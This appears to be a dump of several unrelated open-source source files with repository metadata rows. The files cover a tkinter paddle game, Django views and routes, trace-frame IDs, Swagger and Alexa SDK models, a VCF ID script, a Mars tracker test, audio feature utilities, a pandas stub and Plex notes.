        if self.hit_paddle(pos):
            self.y = -3
        if pos[3] >= self.canvas_height:
            self.hit_bottom = True
        if pos[0] <= 0:
            self.x = 3
        if pos[2] >= self.canvas_width:
            self.x = -3
class Paddle:
    """The player-controlled paddle; arrow keys steer, a click starts the game."""

    def __init__(self, canvas, color):
        self.canvas = canvas
        self.id = canvas.create_rectangle(0, 0, 100, 10, fill=color)
        self.canvas.move(self.id, 200, 300)
        self.x = 0
        self.canvas_width = self.canvas.winfo_width()
        self.started = False
        # Keyboard/mouse bindings drive the paddle state.
        self.canvas.bind_all('<KeyPress-Left>', self.turn_left)
        self.canvas.bind_all('<KeyPress-Right>', self.turn_right)
        self.canvas.bind_all('<Button-1>', self.start_game)

    def draw(self):
        """Advance one frame; stop at either canvas edge."""
        self.canvas.move(self.id, self.x, 0)
        left, _, right, _ = self.canvas.coords(self.id)
        if left <= 0 or right >= self.canvas_width:
            self.x = 0

    def turn_left(self, evt):
        self.x = -2

    def turn_right(self, evt):
        self.x = 2

    def start_game(self, evt):
        self.started = True
# Window and canvas setup; the window stays on top and cannot be resized.
tk = Tk()
tk.title("Game")
tk.resizable(0, 0)
tk.wm_attributes("-topmost", 1)
canvas = Canvas(tk, width=500, height=400, bd=0, highlightthickness=0)
canvas.pack()
tk.update()
paddle = Paddle(canvas, 'blue')
ball = Ball(canvas, paddle, 'red')
# Pre-created, hidden; revealed when the ball reaches the bottom.
game_over_text = canvas.create_text(250, 200, text='GAME OVER', state='hidden')
# Manual event loop (~100 fps): animate only after the first click,
# and freeze with the game-over text once the ball falls past the paddle.
while 1:
    if ball.hit_bottom == False and paddle.started == True:
        ball.draw()
        paddle.draw()
    if ball.hit_bottom == True:
        time.sleep(1)
        canvas.itemconfig(game_over_text, state='normal')
    tk.update_idletasks()
    tk.update()
    time.sleep(0.01)
| [
"swell1009@qq.com"
] | swell1009@qq.com |
230c7858868fd3f749ca0b020713498141986b25 | 9043da349ef0dde4cb6d819a69992274cac99125 | /app/views.py | 18d64f925ce07f531d717d8d30d40975dc5db33a | [] | no_license | zcoder/cantailme-server | e78529f5fa554ff2979215f21089068629aa1259 | 3940c4177ecca43aa78040b129aa29327a466c29 | refs/heads/master | 2021-01-16T21:07:35.372771 | 2012-07-10T18:17:40 | 2012-07-10T18:17:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | from django.shortcuts import get_object_or_404
from annoying.decorators import render_to
from app.models import TailSession
@render_to('app/index.html')
def index(request):
    """Render the index page (no template context needed)."""
    return {}
@render_to('app/tail.html')
def tail(request, hash):
    """Render a TailSession looked up by its hash; 404 when no match exists."""
    # NOTE: `hash` shadows the builtin, but renaming it would change the URL kwarg.
    return {
        'session': get_object_or_404(TailSession, hash=hash),
    }
| [
"nvbn.rm@gmail.com"
] | nvbn.rm@gmail.com |
fb683de87b440fb79e7283fcdf4f67d2062f4338 | c4f0a0215956ff0c29ae491a10416a72c1ce654d | /nails_project/nails_project/accounts/urls.py | d27edda41f2e3ed2b138980e290a802ebb7219da | [] | no_license | borislavstoychev/my_exam | 1a2a499b2e6ac507641a9aad76576d49d4ac6a6d | 9c756f76679ad85697ff123c478b765656d4ce2d | refs/heads/main | 2023-07-13T12:49:40.116891 | 2021-08-25T08:54:44 | 2021-08-25T08:54:44 | 380,476,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 556 | py | from django.urls import path
from nails_project.accounts import views
# Account routes: authentication, registration, profile management and
# e-mail activation. NOTE: the route names contain spaces; {% url %} lookups
# must quote them exactly.
urlpatterns = (
    path('sign-in/', views.SignInView.as_view(), name='sign in user'),
    path('sign-out/', views.SignOutView.as_view(), name='sign out user'),
    path('sign-up/', views.SignUpView.as_view(), name='sign up user'),
    path('profile/<int:pk>/', views.ProfileUpdateView.as_view(), name='profile details'),
    path('delete/<int:pk>/', views.ProfileDeleteView.as_view(), name='profile delete'),
    path('activate/<uidb64>/<token>/', views.activate, name='activate'),
)
| [
"stoy4ew@gmail.com"
] | stoy4ew@gmail.com |
408b2759512d27d6ac6c858cf465b57ebc6a92ae | b67bcff47ed23af86edc27ea8bf8c4b24fd67434 | /cyberbrain/basis.py | 2c5bd59854b426b16202b843f6886116a431ef98 | [
"MIT"
] | permissive | vvoody/Cyberbrain | 3f0f0f671f18377566f32f5f5381ac9ab4a61bb9 | bac343b6e596d270d152e345ee74c2d0b8d265a2 | refs/heads/master | 2020-08-24T02:36:31.111072 | 2019-10-21T07:04:43 | 2019-10-21T07:04:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,940 | py | """Some basic data structures used throughout the project."""
from collections import defaultdict
from enum import Enum
from typing import Dict, NamedTuple, Tuple, Union
# "surrounding" is a 2-element tuple (start_lineno, end_lineno), representing a
# logical line. Line number is frame-wise.
#
# For single-line statement, start_lineno = end_lineno, and is the line number of the
# physical line returned by get_lineno_from_lnotab.
#
# For multiline statement, start_lineno is the line number of the first physical line,
# end_lineno is the last. Lines from start_lineno to end_lineno -1 should end with
# token.NL(or tokenize.NL before 3.7), line end_lineno should end with token.NEWLINE.
#
# Example:
# 0 a = true
# 1 a = true
# 2 b = {
# 3 'foo': 'bar'
# 4 }
# 5 c = false
#
# For the assignment of b, start_lineno = 2, end_lineno = 4
# Logical-line span (see the comment block above for the exact semantics).
Surrounding = NamedTuple("Surrounding", [("start_lineno", int), ("end_lineno", int)])
# A (file path, line number) pair identifying a source position.
SourceLocation = NamedTuple("SourceLocation", [("filepath", str), ("lineno", int)])

# Module-private sentinel object.
_dummy = object()
class NodeType(Enum):
    """Kinds of nodes: a plain source line or a call site."""
    LINE = 1
    CALL = 2
class FrameID:
    """Class that represents a frame.
    Basically, a frame id is just a tuple, where each element represents the frame index
    within the same parent frame. For example, consider this snippet:
    def f(): g()
    def g(): pass
    f()
    f()
    Assuming the frame id for global frame is (0,). We called f two times with two
    frames (0, 0) and (0, 1). f calls g, which also generates two frames (0, 0, 0) and
    (0, 1, 0). By comparing prefixes, it's easy to know whether one frame is the parent
    frame of the other.
    We also maintain the frame id of current code location. New frame ids are generated
    based on event type and current frame id.
    TODO: record function name.
    """

    # Class-level cursor: the frame id of the code location being traced now.
    current_ = (0,)
    # Mapping from parent frame id to max child frame index.
    child_index: Dict[Tuple, int] = defaultdict(int)
    def __init__(self, frame_id_tuple: Tuple[int, ...], co_name: str = ""):
        self._frame_id_tuple = frame_id_tuple
        self.co_name = co_name
    def __eq__(self, other: Union["FrameID", Tuple[int, ...]]):
        # Equal to another FrameID with the same tuple, or to the raw tuple itself.
        if isinstance(other, FrameID):
            return self._frame_id_tuple == other._frame_id_tuple
        return isinstance(other, Tuple) and self._frame_id_tuple == other
    def __hash__(self):
        return hash(self._frame_id_tuple)
    def __add__(self, other: Tuple):
        # Extends the id with extra child indices, yielding a descendant id.
        return FrameID(self._frame_id_tuple + other)
    @property
    def tuple(self):
        return self._frame_id_tuple
    @classmethod
    def current(cls):
        return FrameID(cls.current_)
    @property
    def parent(self):
        # Dropping the last element gives the enclosing frame's id.
        return FrameID(self._frame_id_tuple[:-1])
    def is_child_of(self, other):
        # NOTE(review): this is a pure equality check (other == self's tuple),
        # not the prefix comparison the class docstring describes — TODO confirm
        # the intended semantics.
        return other == self._frame_id_tuple
    def is_parent_of(self, other):
        # NOTE(review): likewise an equality check, not a prefix test — TODO confirm.
        return self == other._frame_id_tuple
    @classmethod
    def create(cls, event: str):
        """Advances the class-level cursor for a trace event and returns a frame id."""
        assert event in {"line", "call", "return"}
        if event == "line":
            return cls.current()
        if event == "call":
            frame_id = cls.current()
            # Descend into a new child frame, numbered by the parent's child count.
            cls.current_ = cls.current_ + (cls.child_index[cls.current_],)
            return frame_id  # callsite is in caller frame.
        if event == "return":
            call_frame = cls.current()
            cls.current_ = cls.current_[:-1]
            # After exiting call frame, increments call frame's child index.
            cls.child_index[cls.current_] += 1
            return call_frame
    def __str__(self):
        """Prints the tuple representation."""
        return f"{str(self._frame_id_tuple)} {self.co_name}"
class ID(str):
    """A class that represents an identifier.
    There's no need to save frame info, because at a certain time, a computation or
    node only sees one value for one identifier, and we can omit others.
    """
| [
"laike9m@gmail.com"
] | laike9m@gmail.com |
0cc1a6763c74990c23270a72d398db34d9e14368 | c4f01eec090833762b884c2078161df087d09b0d | /Other documents/Term papers/Курсач (5 сем)/CourseWorkPolygon/venv/Lib/site-packages/pdhttp/models/wrist_button_states.py | 54f9774741221e78c328ee18e8104101b5dcb943 | [] | no_license | areyykarthik/Zhukouski_Pavel_BSU_Projects | 47a30144c5614b10af521a78fba538a0e9184efa | 3540979e680732d38e25a6b39f09338985de6743 | refs/heads/master | 2023-08-07T02:49:34.736155 | 2021-10-05T21:57:03 | 2021-10-05T21:57:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,076 | py | # coding: utf-8
"""
Robot API
Robot REST API # noqa: E501
OpenAPI spec version: 1.8.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class WristButtonStates(dict):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    """
    # NOTE(review): this model subclasses ``dict``, so an instance carries both
    # regular attributes and mapping entries; ``to_dict`` below merges the two.
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    swagger_types = {
        'timestamp': 'float'
    }

    attribute_map = {
        'timestamp': 'timestamp'
    }

    def __init__(self, timestamp=None):  # noqa: E501
        """WristButtonStates - a model defined in Swagger"""  # noqa: E501
        self._timestamp = None
        self.discriminator = None
        # Only set through the property so future validation hooks apply.
        if timestamp is not None:
            self.timestamp = timestamp

    @property
    def timestamp(self):
        """Gets the timestamp of this WristButtonStates.  # noqa: E501

        :return: The timestamp of this WristButtonStates.  # noqa: E501
        :rtype: float
        """
        return self._timestamp

    @timestamp.setter
    def timestamp(self, timestamp):
        """Sets the timestamp of this WristButtonStates.

        :param timestamp: The timestamp of this WristButtonStates.  # noqa: E501
        :type: float
        """
        self._timestamp = timestamp

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Serialize every declared swagger attribute, recursing into nested
        # models (anything exposing ``to_dict``) and containers of them.
        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        # Because the model itself is a dict, copy its mapping items as well.
        if issubclass(WristButtonStates, dict):
            for key, value in self.items():
                result[key] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        # NOTE(review): compares attribute __dict__ only, not the inherited
        # dict contents — two instances with different mapping items but equal
        # attributes compare equal.
        if not isinstance(other, WristButtonStates):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"shist.pupust@mail.ru"
] | shist.pupust@mail.ru |
b432bf69f1eae4c948cc8044b5e361f046760d5a | 054bc8696bdd429e2b3ba706feb72c0fb604047f | /python/vcf/VCFSetID/VCFSetID.py | e2d14da422c7239b968475a01174e89a00f78923 | [] | no_license | wavefancy/WallaceBroad | 076ea9257cec8a3e1c8f53151ccfc7c5c0d7200f | fbd00e6f60e54140ed5b4e470a8bdd5edeffae21 | refs/heads/master | 2022-02-22T04:56:49.943595 | 2022-02-05T12:15:23 | 2022-02-05T12:15:23 | 116,978,485 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,450 | py | #!/usr/bin/env python3
"""
Set/Replace ID for VCF file. setID as : chr:pos:ref:alt
@Author: wavefancy@gmail.com
Usage:
VCFSetID.py [-i] [-s] [-m int]
VCFSetID.py -h | --help | -v | --version | -f | --format
Notes:
1. Read vcf file from stdin, setID as : chr:pos:ref:alt.
3. Output results to stdout.
Options:
-i Include old rsID.
-s Sort the ref and alt alleles, sorted([ref,alt])
-m int Set the maxmium ID lenght as int.
-h --help Show this screen.
-v --version Show version.
-f --format Show format example.
"""
import sys
from docopt import docopt
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE, SIG_DFL)
def ShowFormat():
    '''Input File format example:'''
    example = '''
input vcf example(abstracted):
----------------------
chr2 13649 . G C
out vcf example:
----------------------
chr2 13649 chr2:13649:G:C G C
    '''
    # Same text the original printed inline; bound to a name for readability.
    print(example)
if __name__ == '__main__':
    args = docopt(__doc__, version='1.0')
    #print(args)

    # -f/--format: print the usage example and exit.
    if(args['--format']):
        ShowFormat()
        sys.exit(-1)

    # -i: keep the old rsID as a suffix of the new chr:pos:ref:alt ID.
    IncludeOld = False
    if args['-i']:
        IncludeOld = True
    # -m: optional cap on the generated ID length (-1 means unlimited).
    MAX_ID_LEN = int(args['-m']) if args['-m'] else -1

    # infile.close()
    # ``output`` stays False until the #CHROM header line is seen; meta lines
    # (##...) are echoed unchanged before that.
    output = False
    for line in sys.stdin:
        line = line.strip()
        if line:
            if output:
                #output results.
                # Only the first 8 columns are split; the genotype columns stay
                # joined in the final field.
                ss = line.split(None, maxsplit=7)
                # check if need to sort ref, alt alleles.
                stemp = sorted(ss[3:5]) if args['-s'] else ss[3:5]
                if IncludeOld:
                    ss[2] = ss[0] + ':' + ss[1] + ':' + stemp[0] + ':' + stemp[1] + ':' + ss[2]
                else:
                    ss[2] = ss[0] + ':' + ss[1] + ':' + stemp[0] + ':' + stemp[1]
                if MAX_ID_LEN > 0:
                    ss[2] = ss[2][0:MAX_ID_LEN]
                sys.stdout.write('%s\n'%('\t'.join(ss)))
                #sys.stdout.write('%s\n'%('\t'.join([ss[x] for x in idIndex])))
            else:
                if line.startswith('##'):
                    sys.stdout.write('%s\n'%(line))
                elif line.startswith('#C') or line.startswith('#c'):
                    output = True
                    sys.stdout.write('%s\n'%(line))

    sys.stdout.close()
    sys.stderr.flush()
    sys.stderr.close()
| [
"wavefancy@gmail.com"
] | wavefancy@gmail.com |
fae7eca82ace71668d57d4156e436c6965ab22b9 | 132b261b16338cb7b9297bd04eaaaafe34bde89e | /sendSMSSkillLambda/package/ask_sdk_model/interfaces/audioplayer/error.py | 0c4c22d8473612ca7097a846067b1f065118c3e7 | [
"Apache-2.0"
] | permissive | ziniman/aws-alexa-lambda-workshop | 2835b998272b01856d3dbea6481e9ee4457da2f2 | d1e291ebd3e20132098541c92735d29491bfc932 | refs/heads/master | 2020-06-25T22:58:04.814822 | 2019-09-08T10:37:00 | 2019-09-08T10:37:00 | 199,446,036 | 0 | 3 | Apache-2.0 | 2019-09-05T09:03:12 | 2019-07-29T12:11:58 | Python | UTF-8 | Python | false | false | 3,562 | py | # coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional, Union
from datetime import datetime
from ask_sdk_model.interfaces.audioplayer.error_type import ErrorType
class Error(object):
    """Swagger-generated AudioPlayer error payload model.

    :param message: 
    :type message: (optional) str
    :param object_type: 
    :type object_type: (optional) ask_sdk_model.interfaces.audioplayer.error_type.ErrorType

    """
    deserialized_types = {
        'message': 'str',
        'object_type': 'ask_sdk_model.interfaces.audioplayer.error_type.ErrorType'
    }  # type: Dict

    attribute_map = {
        'message': 'message',
        'object_type': 'type'
    }  # type: Dict

    def __init__(self, message=None, object_type=None):
        # type: (Optional[str], Optional[ErrorType]) -> None
        """
        :param message: 
        :type message: (optional) str
        :param object_type: 
        :type object_type: (optional) ask_sdk_model.interfaces.audioplayer.error_type.ErrorType
        """
        self.__discriminator_value = None  # type: str

        self.message = message
        self.object_type = object_type

    def to_dict(self):
        # type: () -> Dict[str, object]
        """Returns the model properties as a dict"""
        result = {}  # type: Dict

        # Serialize each declared attribute; Enums collapse to their .value,
        # nested models recurse through their own to_dict.
        for attr, _ in six.iteritems(self.deserialized_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else
                    x.value if isinstance(x, Enum) else x,
                    value
                ))
            elif isinstance(value, Enum):
                result[attr] = value.value
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else
                    (item[0], item[1].value)
                    if isinstance(item[1], Enum) else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        # type: () -> str
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        # type: () -> str
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        # type: (object) -> bool
        """Returns true if both objects are equal"""
        if not isinstance(other, Error):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        # type: (object) -> bool
        """Returns true if both objects are not equal"""
        return not self == other
| [
"oritalul@amazon.com"
] | oritalul@amazon.com |
873ef77356637ce0e4537e113fbf9e125a3bb52c | a3597afc5aaf15723dba35d5b114f2b3e129a168 | /mars/services/lifecycle/supervisor/tests/test_tracker.py | df62277ac9f2722e4ab8cefc3bfe49accb92f48e | [
"BSD-3-Clause",
"CC0-1.0",
"ISC",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause",
"MIT"
] | permissive | hekaisheng/mars | 5edff06194779d6005bd768dabadd9191c812cb3 | 49ce0c1c691d405040e53b8eb8d8af9b7e87ae55 | refs/heads/master | 2023-01-10T06:24:05.532213 | 2021-12-07T08:21:56 | 2021-12-07T08:21:56 | 160,764,275 | 0 | 2 | Apache-2.0 | 2021-01-10T08:43:43 | 2018-12-07T03:12:41 | Python | UTF-8 | Python | false | false | 3,052 | py | # Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pytest
from ..... import oscar as mo
from ..... import tensor as mt
from .....core import tile
from ....cluster import MockClusterAPI
from ....meta import MockMetaAPI
from ....session import MockSessionAPI
from ....storage import MockStorageAPI, DataNotExist
from ... import TileableNotTracked
from ...supervisor.tracker import LifecycleTrackerActor
@pytest.mark.asyncio
async def test_tracker():
    """Exercise LifecycleTrackerActor: track, incref/decref, and cleanup.

    After the final decref the tracker is expected to have released both the
    chunk metadata and the stored chunk data.
    """
    pool = await mo.create_actor_pool("127.0.0.1", n_process=0)

    async with pool:
        addr = pool.external_address
        session_id = "test_session"
        # Mock services the tracker depends on.
        await MockClusterAPI.create(addr)
        await MockSessionAPI.create(addr, session_id=session_id)
        meta_api = await MockMetaAPI.create(session_id, addr)
        storage_api = await MockStorageAPI.create(session_id, addr)

        try:
            tracker = await mo.create_actor(
                LifecycleTrackerActor,
                session_id,
                uid=LifecycleTrackerActor.gen_uid(session_id),
                address=pool.external_address,
            )

            # A 15x5 tensor with chunk_size=5 — tiles into several chunks.
            t = mt.random.rand(15, 5, chunk_size=5)
            t = tile(t)
            tileable_key = t.key
            chunk_keys = []
            for c in t.chunks:
                chunk_keys.append(c.key)
                await meta_api.set_chunk_meta(c, bands=[(addr, "numa-0")])
                await storage_api.put(c.key, np.random.rand(5, 5))

            await tracker.track(tileable_key, chunk_keys)
            await tracker.incref_tileables([tileable_key])
            await tracker.incref_chunks(chunk_keys[:2])
            await tracker.decref_chunks(chunk_keys[:2])
            await tracker.decref_tileables([tileable_key])

            # All references released: no ref counts should remain.
            assert len(await tracker.get_all_chunk_ref_counts()) == 0

            # Meta and data for every chunk must have been cleaned up.
            for chunk_key in chunk_keys:
                with pytest.raises(KeyError):
                    await meta_api.get_chunk_meta(chunk_key)
            for chunk_key in chunk_keys:
                with pytest.raises(DataNotExist):
                    await storage_api.get(chunk_key)

            # Ref-count operations on unknown tileables must raise.
            with pytest.raises(TileableNotTracked):
                await tracker.incref_tileables(["not_tracked"])
            with pytest.raises(TileableNotTracked):
                await tracker.decref_tileables(["not_tracked"])
        finally:
            await MockStorageAPI.cleanup(pool.external_address)
            await MockClusterAPI.cleanup(pool.external_address)
| [
"noreply@github.com"
] | hekaisheng.noreply@github.com |
4600df2a769dabba26bb553fe5ece02566fc38c3 | 5598fe9705c7066407ee02245ae5f98f3fec3a54 | /utils.py | 309482bf5635e5221ceec060f59ecba73c132a36 | [] | no_license | EgorLakomkin/TopCoderSpokenLanguageRecognition | 8d2bb1608cc6d4eaf25d4bc43c48ce9e7f68bb4a | 73df1b4742a71fb825d78e7f15f3a2a54339d4ef | refs/heads/master | 2021-01-10T17:10:34.030434 | 2015-11-14T11:03:47 | 2015-11-14T11:03:47 | 46,171,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,253 | py | import os
from subprocess import check_call
from path import Path
import librosa
from cPickle import Pickler, Unpickler
import cPickle
from multiprocessing import Pool
import numpy as np
from features_storage import FeatureStorage
DATA_DIR = './data'
FEATURE_STORAGE = 'features_storage'
TRAINING_FILE = os.path.join(DATA_DIR, 'trainingset.csv')
TESTING_FILE = os.path.join(DATA_DIR, 'testingset.csv' )
FILES_DIR = os.path.join( DATA_DIR, 'data' )
def load_classes_info():
    """Build name->index and index->name maps for the languages in TRAINING_FILE.

    Indices are assigned in order of first appearance of each language name.
    """
    name_to_idx = {}
    idx_to_name = {}
    for row in open(TRAINING_FILE):
        _, label = row.strip().split(',')
        if label in name_to_idx:
            continue
        new_idx = len(name_to_idx)
        name_to_idx[label] = new_idx
        idx_to_name[new_idx] = label
    return name_to_idx, idx_to_name
def get_mfcc(signal, n_fft = 4096, hop_length = 1024, sr=44100, n_mfcc=20, logscaled=True):
    """Computes the mel-frequency cepstral coefficients of a signal

    ARGS
        signal: audio signal <number array>
        n_fft: FFT size <int>
        hop_length : hop length <int>
        sr: sampling rate <int>
        n_mfcc: number of MFC coefficients <int>
        logscaled: log-scale the magnitudes of the spectrogram <bool>

    RETURN
        mfcc: mel-frequency cepstral coefficients <number numpy array>
    """
    S = librosa.feature.melspectrogram(signal, sr=sr, n_fft=n_fft, hop_length=hop_length)
    # Bug fix: the original assigned ``log_S`` only inside the ``if logscaled``
    # branch but unconditionally passed ``log_S`` to librosa.feature.mfcc,
    # raising NameError whenever logscaled=False.  Now the raw mel
    # spectrogram is used when log-scaling is disabled.
    if logscaled:
        S = librosa.logamplitude(S)
    mfcc = librosa.feature.mfcc(S=S, n_mfcc=n_mfcc)
    return mfcc
def load_test_features(test_filename, feature_func, limit = None):
    """Compute (or load cached) features for every test file.

    test_filename: cache name inside FEATURE_STORAGE.
    feature_func:  picklable callable applied to (path, None) tuples.
    limit:         optional cap on the number of test files processed.
    """
    # NOTE(review): the pool is created even on a cache hit, where it is never
    # used; ``terminate`` right after ``close`` is also redundant.
    pool = Pool()
    test_data = get_all_test_data()
    if limit:
        test_data = test_data[:limit]
    feature_storage = FeatureStorage( name = test_filename, base_dir = FEATURE_STORAGE )
    if not feature_storage.exists():
        print "Loading test from scratch"
        # Test items carry no label, hence the ``None`` second element.
        for_features = [ (path, None) for (path, filename ) in test_data ]
        X_test_transformed = pool.map( feature_func, for_features )
        print "Dumping test features"
        feature_storage.save( X_test_transformed )
        print "Finished dumping"
    else:
        print "Loading test from cache"
        X_test_transformed = feature_storage.load()
    pool.close()
    pool.terminate()
    return X_test_transformed
def shuffle_in_unison_inplace(a, b):
    """Shuffle two same-length arrays with one shared random permutation.

    Returns the two reindexed arrays; pairings between a[i] and b[i] are kept.
    """
    n = a.shape[0]
    assert n == b.shape[0]
    order = np.random.permutation(n)
    return a[order], b[order]
def load_train_features( train_filename, feature_func, limit = None ):
    """Compute (or load cached) features for every training file.

    train_filename: cache name inside FEATURE_STORAGE.
    feature_func:   picklable callable applied to (path, class_idx) tuples.
    limit:          optional cap on the number of training files processed.
    """
    feature_storage = FeatureStorage( name = train_filename, base_dir = FEATURE_STORAGE )
    if not feature_storage.exists( ):
        all_train_data = return_all_train_files()
        if limit is not None:
            all_train_data = all_train_data[:limit]
        print "Started processing train"
        # Parallelize feature extraction across all cores.
        pool = Pool()
        X_train_transformed = pool.map( feature_func, all_train_data )
        pool.close()
        pool.terminate()
        print "Dumping train features"
        feature_storage.save( X_train_transformed )
    else:
        print "Loading train from cache"
        X_train_transformed = feature_storage.load()
    return X_train_transformed
def convert_to_wav(dir):
    """Transcode every .mp3 under ``dir`` (recursively) to a 44.1 kHz .wav.

    Requires the ``avconv`` binary on PATH; output files are written directly
    into ``dir`` (flattened), named after the source file.
    """
    train_dir = Path( dir )
    for f in train_dir.walkfiles('*.mp3'):
        name = f.name.replace('.mp3', '') + '.wav'
        check_call(['avconv', '-ar', '44100', '-i', str(f), os.path.abspath( os.path.join( dir, name ) )])
def get_all_test_data():
    """Return (wav_path, original_mp3_name) pairs listed in TESTING_FILE."""
    pairs = []
    for raw in open(TESTING_FILE):
        mp3_name = raw.strip()
        wav_path = os.path.join(FILES_DIR, mp3_name.replace('.mp3', '.wav'))
        pairs.append((wav_path, mp3_name))
    return pairs
def return_all_train_files():
    """Return (wav_path, class_index) pairs for every row of TRAINING_FILE."""
    label_to_idx, _ = load_classes_info()
    pairs = []
    for row in open(TRAINING_FILE):
        mp3_name, label = row.strip().split(',')
        wav_path = os.path.join(FILES_DIR, mp3_name.replace('.mp3', '.wav'))
        pairs.append((wav_path, label_to_idx[label]))
    return pairs
if __name__ == "__main__":
    # Script entry point: transcode every .mp3 under ./data to 44.1 kHz .wav.
    convert_to_wav('./data')
| [
"you@example.com"
] | you@example.com |
ff2417be8026f879c74193c9a68d160b8a26196d | c8a04384030c3af88a8e16de4cedc4ef8aebfae5 | /stubs/pandas/tests/frame/test_asof.pyi | cf6de5856ad19886ade3d96fdb920a6514d14236 | [
"MIT"
] | permissive | Accern/accern-xyme | f61fce4b426262b4f67c722e563bb4297cfc4235 | 6ed6c52671d02745efabe7e6b8bdf0ad21f8762c | refs/heads/master | 2023-08-17T04:29:00.904122 | 2023-05-23T09:18:09 | 2023-05-23T09:18:09 | 226,960,272 | 3 | 2 | MIT | 2023-07-19T02:13:18 | 2019-12-09T20:21:59 | Python | UTF-8 | Python | false | false | 718 | pyi | # Stubs for pandas.tests.frame.test_asof (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
# pylint: disable=unused-argument,redefined-outer-name,no-self-use,invalid-name
# pylint: disable=relative-beyond-top-level
from typing import Any
def date_range_frame() -> Any:
    # Stub for a module-level function in the original test module; presumably
    # a pytest fixture returning a date-indexed DataFrame — confirm upstream.
    ...
class TestFrameAsof:
    # Type stub: signatures only, bodies elided per .pyi convention.
    def test_basic(self, date_range_frame: Any) -> None:
        ...

    def test_subset(self, date_range_frame: Any) -> None:
        ...

    def test_missing(self, date_range_frame: Any) -> None:
        ...

    def test_all_nans(self, date_range_frame: Any) -> None:
        ...

    def test_time_zone_aware_index(self, stamp: Any, expected: Any) -> None:
        ...
| [
"josua.krause@gmail.com"
] | josua.krause@gmail.com |
2e908b9f14dad212166d5d26c5846a4014df8854 | 750d8ade6abc2b3bd6a24e660a4992114db6ac0c | /lib/music/plex/__init__.py | 6b0e02e3511aa7df7bc5c68e754877876aaa33c2 | [] | no_license | dskrypa/music_manager | 8a00a4bd7b32a87dab2441614c94346fa87c4f13 | ad7265fbd203962a4bf9cf6444c8e10d561a307c | refs/heads/main | 2023-08-09T06:26:46.592118 | 2023-08-08T11:38:08 | 2023-08-08T11:38:08 | 234,730,172 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,016 | py | """
Package for working with the Plex API, and for syncing Plex ratings with ratings stored in ID3 tags.
Note on fetchItems:
The kwargs to fetchItem/fetchItems use __ to access nested attributes, but the only nested attributes available are
those that are returned in the items in ``plex.server.query(plex._ekey(search_type))``, not the higher level objects.
Example available attributes::\n
>>> data = plex.server.query(plex._ekey('track'))
>>> media = [c for c in data[0]]
>>> for m in media:
... m
... m.attrib
... print(', '.join(sorted(m.attrib)))
... for part in m:
... part
... part.attrib
... print(', '.join(sorted(part.attrib)))
...
<Element 'Media' at 0x000001E4E3971458>
{'id': '76273', 'duration': '238680', 'bitrate': '320', 'audioChannels': '2', 'audioCodec': 'mp3', 'container': 'mp3'}
audioChannels, audioCodec, bitrate, container, duration, id
<Element 'Part' at 0x000001E4E48D9458>
{'id': '76387', 'key': '/library/parts/76387/1555183134/file.mp3', 'duration': '238680', 'file': '/path/to/song.mp3', 'size': '9773247', 'container': 'mp3', 'hasThumbnail': '1'}
container, duration, file, hasThumbnail, id, key, size
>>> data = plex.server.query(plex._ekey('album'))
>>> data[0]
<Element 'Directory' at 0x000001E4E3C92458>
>>> print(', '.join(sorted(data[0].attrib.keys())))
